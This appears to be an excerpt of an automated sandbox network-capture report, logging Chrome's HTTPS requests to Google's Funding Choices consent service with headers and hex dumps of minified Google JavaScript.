                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1936INData Raw: 65 78 4f 66 28 62 2c 63 7c 7c 30 29 21 3d 3d 2d 31 7d 7d 29 3b 0a 70 28 22 41 72 72 61 79 2e 66 72 6f 6d 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 29 7b 63 3d 63 21 3d 6e 75 6c 6c 3f 63 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 7d 3b 76 61 72 20 65 3d 5b 5d 2c 66 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 62 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 74 79 70 65 6f 66 20 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 7b 62 3d 66 2e 63 61 6c 6c 28 62 29 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 21 28 66 3d 62 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 65
                                                                                                                                                                                                                                                                                                                      Data Ascii: exOf(b,c||0)!==-1}});p("Array.from",function(a){return a?a:function(b,c,d){c=c!=null?c:function(h){return h};var e=[],f=typeof Symbol!="undefined"&&Symbol.iterator&&b[Symbol.iterator];if(typeof f=="function"){b=f.call(b);for(var g=0;!(f=b.next()).done;)e
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1936INData Raw: 3b 64 3d 4e 75 6d 62 65 72 28 64 29 3b 64 3c 30 26 26 28 64 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 65 2b 64 29 29 3b 66 6f 72 28 63 3d 4e 75 6d 62 65 72 28 63 7c 7c 30 29 3b 63 3c 64 3b 63 2b 2b 29 74 68 69 73 5b 63 5d 3d 62 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 7d 29 3b 76 61 72 20 74 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 7d 3b 70 28 22 49 6e 74 38 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 55 69 6e 74 38 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 49 6e
                                                                                                                                                                                                                                                                                                                      Data Ascii: ;d=Number(d);d<0&&(d=Math.max(0,e+d));for(c=Number(c||0);c<d;c++)this[c]=b;return this}});var ta=function(a){return a?a:Array.prototype.fill};p("Int8Array.prototype.fill",ta);p("Uint8Array.prototype.fill",ta);p("Uint8ClampedArray.prototype.fill",ta);p("In
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1936INData Raw: 21 3d 2d 31 7d 3b 45 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 41 61 3f 21 21 5f 2e 42 61 26 26 5f 2e 42 61 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 3b 0a 47 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 61 28 29 3f 43 61 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 5f 2e 44 61 28 22 43 68 72 6f 6d 65 22 29 7c 7c 5f 2e 44 61 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 45 61 28 29 3f 30 3a 5f 2e 44 61 28 22 45 64 67 65 22 29 29 7c 7c 5f 2e 44 61 28 22 53 69 6c 6b 22 29 7d 3b 5f 2e 49 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 48 61 26 26 61 21 3d 6e 75 6c 6c 26 26 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 7d 3b 4c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76
                                                                                                                                                                                                                                                                                                                      Data Ascii: !=-1};Ea=function(){return _.Aa?!!_.Ba&&_.Ba.brands.length>0:!1};Ga=function(){return Ea()?Ca("Chromium"):(_.Da("Chrome")||_.Da("CriOS"))&&!(Ea()?0:_.Da("Edge"))||_.Da("Silk")};_.Ia=function(a){return Ha&&a!=null&&a instanceof Uint8Array};La=function(){v
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1936INData Raw: 73 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 61 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 3f 61 3a 6e 75 6c 6c 7d 63 61 74 63 68 28 62 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 3b 77 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 75 62 3d 3d 3d 76 6f 69 64 20 30 29 7b 76 61 72 20 62 3d 6e 65 77 20 76 62 28 5b 5d 2c 7b 7d 29 3b 75 62 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 63 61 74 2e 63 61 6c 6c 28 5b 5d 2c 62 29 2e 6c 65 6e 67 74 68 3d 3d 3d 31 7d 75 62 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 53 79 6d 62 6f 6c 2e 69 73 43 6f 6e 63 61 74 53 70 72 65 61 64 61 62 6c 65
                                                                                                                                                                                                                                                                                                                      Data Ascii: sb=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};wb=function(a){if(ub===void 0){var b=new vb([],{});ub=Array.prototype.concat.call([],b).length===1}ub&&typeof Symbol==="function"&&Symbol.isConcatSpreadable


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      79192.168.2.449988142.250.186.1744437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:40 UTC912OUTGET /f/AGSKWxXE0rdt5cwklf9PRBqqi8rFncdilTmLVYbRCmgcYEIr_h6aXnlDVbYl8-Mw69k26WrMfK2ANMfR9tO7b_s5NhLr9ZNkM_vAqZxxWuutweCz4t4EvQ7RPeu7lVUr28c-H-5-bioZAg==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzcyLDU3NDAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNl0sbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsMV0sImh0dHBzOi8vdHJrc3lsbi5uZXQvRXJyb3IiLG51bGwsW1s4LCJZc2dPT2N0dWtySSJdLFs5LCJlbi1VUyJdLFsxOSwiMiJdLFsxNywiWzBdIl0sWzE4LCJbW1sxXV1dIl1dXQ HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1936INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:41 GMT
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-lVneTKiX8AqvF4CmvwH_VQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                      reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytDikmJw1pBikPj6kkkNiJ3SZ7AGAHHrzXOsk4E46d951gIgdte6yOoPxIYKl1jtgdix6BKrJxCr9lxiNQbi--susT4H4iKJK6wNQHy76QrrYyBm-HqFlQOIhbg59k7p38kmcGPLf1cljaT8wvjk_LySosyk0pL8orTktNTi1KKy1KJ4IwMjE0MDYwM9A4P4AgMAOsY_mw"
                                                                                                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1936INData Raw: 64 39 66 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 2e 72 75 6e 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 76 61 72 20 74 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 6e 6e 28 63 29 2c 66 2c 67 2c 68 3d
                                                                                                                                                                                                                                                                                                                      Data Ascii: d9fif (typeof __googlefc.fcKernelManager.run === 'function') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs||{};(function(_){var window=this;try{var tn=function(a,b,c,d){var e=nn(c),f,g,h=
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1558INData Raw: 31 29 3b 5f 2e 59 66 28 64 2c 32 2c 65 29 7d 5f 2e 7a 28 63 2c 5f 2e 61 67 2c 32 29 26 26 28 63 3d 5f 2e 45 28 63 2c 5f 2e 61 67 2c 32 29 2c 5f 2e 4e 28 64 2c 33 2c 63 29 29 3b 5f 2e 4e 28 62 2c 32 2c 64 29 3b 61 2e 52 28 32 2c 5f 2e 4a 28 62 29 29 7d 7d 7d 3b 76 61 72 20 41 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 41 6e 2c 5f 2e 49 29 3b 76 61 72 20 42 6e 3d 5b 32 2c 33 5d 3b 76 61 72 20 7a 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 7a 6e 2c 5f 2e 49 29 3b 76 61 72 20 43 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 43 6e 2c 5f 2e 49 29 3b 76 61 72 20 44 6e 3d 5f 2e 75 28 43 6e 29 3b 76 61
                                                                                                                                                                                                                                                                                                                      Data Ascii: 1);_.Yf(d,2,e)}_.z(c,_.ag,2)&&(c=_.E(c,_.ag,2),_.N(d,3,c));_.N(b,2,d);a.R(2,_.J(b))}}};var An=function(a){this.l=_.t(a)};_.v(An,_.I);var Bn=[2,3];var zn=function(a){this.l=_.t(a)};_.v(zn,_.I);var Cn=function(a){this.l=_.t(a)};_.v(Cn,_.I);var Dn=_.u(Cn);va
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      80192.168.2.449989142.250.186.1744437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC976OUTGET /f/AGSKWxVliFzt__e0MUU_SOrGx-lhlS6uQAPdw7fuvmC9ZOEsgVNDhFt6QsFFNlaOQwy5PSsxhxcDWnH1x8vkCo4uTDzz2qaGDiiWUxEb4DdVXaVIkxYLejIwjKuC0DHCYaFx6xUnkqAxgw==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzczLDk4NTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNiwxNV0sbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsMV0sImh0dHBzOi8vdHJrc3lsbi5uZXQvRXJyb3IiLG51bGwsW1s4LCJZc2dPT2N0dWtySSJdLFs5LCJlbi1VUyJdLFsxOSwiMiJdLFsxNywiWzBdIl0sWzE4LCJbW1sxXV1dIl0sWzIsIltudWxsLFtudWxsLDEsWzE3MzAzOTg3NzQsMjY1MzU5MDAwXV1dIl1dXQ HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1936INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:41 GMT
                                                                                                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-231Lw3WGQi_Fn5dwUPALgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                      reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytDikmLw05BikPj6kkkNiJ3SZ7AGAHHrzXOsk4E46d951gIgdte6yOoPxIYKl1jtgdix6BKrJxCr9lxiNQbi--susT4H4iKJK6wNQHy76QrrYyBm-HqFlQOIhbg59k7p38kmsGJBq4eSRlJ-YXxyfl5JUWZSaUl-UVpyWmpxalFZalG8kYGRiaGBsYGegUF8gQEAINQ-6w"
                                                                                                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1936INData Raw: 62 39 38 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 2e 72 75 6e 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 76 61 72 20 6a 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 6a 44 2c 5f 2e
                                                                                                                                                                                                                                                                                                                      Data Ascii: b98if (typeof __googlefc.fcKernelManager.run === 'function') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs||{};(function(_){var window=this;try{var jD=function(a){this.l=_.t(a)};_.v(jD,_.
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1039INData Raw: 5c 2f 66 75 6e 64 69 6e 67 63 68 6f 69 63 65 73 6d 65 73 73 61 67 65 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 5c 2f 66 5c 2f 41 47 53 4b 57 78 57 44 4c 39 4e 4c 5a 5a 75 78 6c 30 6f 59 55 34 71 7a 47 76 54 76 55 4c 6c 39 70 59 71 50 45 5a 71 4f 76 75 41 7a 72 36 36 66 58 6e 62 5f 39 6c 64 66 33 72 34 52 4b 74 42 4c 65 4d 6a 48 77 5f 74 57 42 6b 6e 64 6f 59 64 64 75 54 38 55 32 53 7a 5f 79 73 4f 32 48 76 71 6e 4a 2d 6b 45 68 58 77 72 74 6b 6b 61 5a 41 54 36 37 71 52 54 72 65 33 6e 6e 30 62 54 35 6a 6e 42 4b 6c 6b 69 6b 79 6f 69 6a 4b 69 30 56 51 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 78 32 32 5c 78 35 64 2c 5c 78 35 62 6e 75 6c 6c 2c 5c 78 35 62 37 2c 36 2c 31 35 5c 78 35 64 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c
                                                                                                                                                                                                                                                                                                                      Data Ascii: \/fundingchoicesmessages.google.com\/f\/AGSKWxWDL9NLZZuxl0oYU4qzGvTvULl9pYqPEZqOvuAzr66fXnb_9ldf3r4RKtBLeMjHw_tWBkndoYdduT8U2Sz_ysO2HvqnJ-kEhXwrtkkaZAT67qRTre3nn0bT5jnBKlkikyoijKi0VQ\\\\u003d\\\\u003d\\\x22\x5d,\x5bnull,\x5b7,6,15\x5d,null,null,null,null,
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      81192.168.2.449994142.250.186.1744437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC974OUTGET /f/AGSKWxUB99RlJ_8i7LLI3oNTdMLmCw2CQVqckIxJK9gf-02-WMpmqGqaY-w86Dc5gRTrOlzGhRgGU2qqZ_W1MTy0YY21viTL3rQc18HIx6JgnCbhVFUEjsqMaMITOmSLmaXPdGl8WFcYzw==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4Nzc1LDY4MTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNiwxNSw5XSxudWxsLDIsbnVsbCwiZW4iLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCwxXSwiaHR0cHM6Ly90cmtzeWxuLm5ldC9FcnJvciIsbnVsbCxbWzgsIllzZ09PY3R1a3JJIl0sWzksImVuLVVTIl0sWzE5LCIyIl0sWzE3LCJbMF0iXSxbMTgsIltbWzFdXV0iXSxbMiwiW251bGwsW251bGwsMSxbMTczMDM5ODc3NCwyNjUzNTkwMDBdXV0iXV1d HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1936INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:41 GMT
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-YpoEndcAtJMs3_ouGUJ93A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                      reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytDikmLw1pBikPj6kkkNiJ3SZ7AGAHHrzXOsk4E46d951gIgdte6yOoPxIYKl1jtgdix6BKrJxCr9lxiNQbi--susT4H4iKJK6wNQHy76QrrYyBm-HqFlQOIhbg59k7p38kmcGLWMn8ljaT8wvjk_LySosyk0pL8orTktNTi1KKy1KJ4IwMjE0MDYwM9A4P4AgMAKo4_Kg"
                                                                                                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
